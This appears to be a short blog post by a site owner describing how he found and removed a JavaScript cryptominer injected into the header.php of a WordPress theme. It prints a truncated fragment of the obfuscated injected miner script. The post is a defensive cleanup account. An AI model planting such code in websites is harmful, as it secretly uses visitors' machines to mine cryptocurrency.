Agus Nizami

When I open a page in Media-Islam.or.id I found message from Avast:

Threat secured

We’ve safely aborted connection on media-islam.or.id because it was infected with JS:Miner-C[Trj}.

There is Miner-C trojan virus there. Media-Islam is my website, so I open Filezilla and find the files that recently modified there.

There is a file: header.php in the theme of Atahualpa that recently modified.

The header.php was modified on 1/5/2018 while others 12/20/2017 or older. It has to be modified by the virus. The file permission 644 does not make the file imunne from the virus attack.

I open the header.php and here is the look:

There is a script injected by the virus to header.php:

var _0xe2f6=[“(k(1k){\”9w bW\”;j J=k(3b,I){d.I=I||{};d.6H=3b;d.6o=z;d.1g=[];d.4T=0;d.2P=z;d.6Q=R;d.3W=3;d.8I=z;d.4b=0;d.6t=0;d.5R=D.4L(0,D.2T(.99,d.I.3v||0));d.bA=T;d.66=T;d.8L=T;d.1e={2R:!!d.I.fW,1l:z,4V:z,6P:fZ,2E:{}};d.1a={1X:D.7H()*g3|0,2G:L.5y,7f:0,3X:0,8x:0,1l:z};if(1k.bs){26{d.6Z=F bs(\”o\”);d.6Z.4R=k(N){if(N.1n===\”bf\”){d.1a.8x=1b.V()}}.1m(d)}1T(e){}}if(L.2t.4d){d.45=F L.fE(d.6H,{dg:d.I.dg||\”g5\”,g6:d.I.gq||\”go\”})}d.70={4w:[],7O:[],9S:[],1v:[],11:[],ab:[],8X:[],8z:[]};j c9=dt.gm||4;d.6g=d.I.1S||c9;d.aA=d.c1()&&!d.I.gn;d.5g=\”aC\”;d.9M=d.bJ.1m(d);d.aZ=d.ai.1m(d)};J.E.2Y=k(2G,dH){d.1a.2G=2G||

….

[_0xaa12x3])}};return _0xaa12x1}(_0xe2f6[0],62,1151,_0xe2f6[3][_0xe2f6[2]](_0xe2f6[1]),0,{}))

I delete the script so the header.php will be like this

<head><head>
<meta http-equiv=”Content-Type” content=”<?php bloginfo(‘html_type’); ?>; charset=<?php bloginfo(‘charset’); ?>” /> <?php // if index.php or another page template (copied from index.php) was not usedif (!isset($bfa_ata))  

Remember: you should delete the strange code between the  and  because that is the virus.

Filed under: IT | Tagged: Miner-C, Trojan, virus |